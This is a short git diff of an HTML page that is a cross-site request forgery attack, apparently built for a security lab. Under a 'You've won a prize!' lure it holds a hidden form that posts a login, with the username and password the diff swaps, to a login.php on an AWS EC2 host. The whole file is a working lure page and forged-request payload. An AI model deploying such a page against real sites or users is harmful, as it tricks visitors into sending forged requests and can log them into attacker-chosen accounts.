--- a/index.html
+++ b/index.html
@@ -2,8 +2,8 @@
   <body>
     <h1>You've won a prize! Click to claim.</h1>
     <form id="csrf-form" action="http://ec2-3-107-205-120.ap-southeast-2.compute.amazonaws.com/phpshrinkit/login.php" method="POST">
-      <input type="hidden" name="user" value="diablo" />
-      <input type="hidden" name="pwd" value="diablo1" />
+      <input type="hidden" name="user" value="user1" />
+      <input type="hidden" name="pwd" value="password1" />
       <input type="hidden" name="step" value="login" />
       <input type="hidden" name="submit" value="Submit" />
     </form>
@@ -14,4 +14,5 @@
     </script>
   </body>
 </html>
+
 
